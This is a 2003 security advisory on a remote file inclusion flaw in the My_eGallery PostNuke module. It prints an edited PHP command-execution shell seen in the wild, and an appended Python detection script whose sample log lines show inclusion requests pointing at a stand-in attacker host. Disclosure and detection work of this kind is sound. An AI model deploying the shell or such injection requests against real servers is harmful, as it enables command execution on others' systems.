[VulnWatch] Remote execution in My_eGallery

From: Bojan Zdrnja (Bojan.Zdrnja_at_LSS.hr)
Date: 11/26/03

    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 27 Nov 2003 09:38:48 +1300
    
    

    Product: My_eGallery
    Versions affected: all <3.1.1.g
    Website: http://lottasophie.sourceforge.net/index.php

    1. Introduction
    ---------------

    My_eGallery is a very nice PostNuke module, which allows users to create and
    manipulate their own galleries on the web, plus offers various additional
    features.
    For more information and a demonstration you can go to the Website above.

    2. Exploit
    ----------

    Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
    vulnerability.

    Certain PHP files use some parameters in include functions without
    filtering them.
    An intruder can craft PHP code on their Web site and supply a parameter to
    My_eGallery so that it actually includes the malicious PHP code.

    The following code was captured as being used in the wild (edited
    intentionally):

    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      print_output();
    ?>

    This allows execution of any command on the server with My_eGallery, under
    the privileges of the Web server (usually apache or httpd).

    3. Solution
    -----------

    Vendor was contacted and promptly replied. Fix is available at the vendor's
    site:

    http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

    As this was seen being exploited in the wild, users are urged to upgrade to
    the latest version as soon as possible.

    Regards,

    Bojan Zdrnja
    CISSP
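
Since the advisory reports exploitation in the wild, one way to review web server access logs for requests that hand a remote URL to a PHP script parameter. This is an added example, not part of the original advisory or the My_eGallery project; the script path, the parameter name `param`, the hosts and the log lines are constructed, because the advisory does not name the affected files or parameters.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address, request target and status from a Common/Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_remote_include_attempts(lines):
    """Return (client_ip, script_path, parameter, status) for every request to a
    .php script that carries a remote URL in one of its query parameters."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith(".php"):
            continue  # only PHP scripts can pass the value to include()
        # parse_qsl percent-decodes values, so "http%3A%2F%2F..." is caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((m.group("ip"), target.path, name, int(m.group("status"))))
    return hits


# Constructed sample lines: hypothetical script path, parameter name and hosts.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Nov/2003:09:12:01 +1300] '
    '"GET /modules.php?op=modload&name=My_eGallery&file=index HTTP/1.0" 200 5120',
    '198.51.100.7 - - [27/Nov/2003:09:13:40 +1300] '
    '"GET /modules/My_eGallery/example.php?param=http://attacker.invalid/x.gif HTTP/1.0" 200 312',
    '198.51.100.7 - - [27/Nov/2003:09:13:55 +1300] '
    '"GET /modules/My_eGallery/example.php?param=http%3A%2F%2Fattacker.invalid%2Fx.txt HTTP/1.0" 404 210',
    '192.0.2.44 - - [27/Nov/2003:09:15:02 +1300] '
    '"GET /images/logo.gif?ref=http://site.example/ HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for ip, path, param, status in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} {path} param={param} status={status}")
```

A hit answered with status 200 deserves the closest look, since the script ran and may have fetched the remote file; legitimate redirect or referrer parameters will also match and need to be triaged out.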

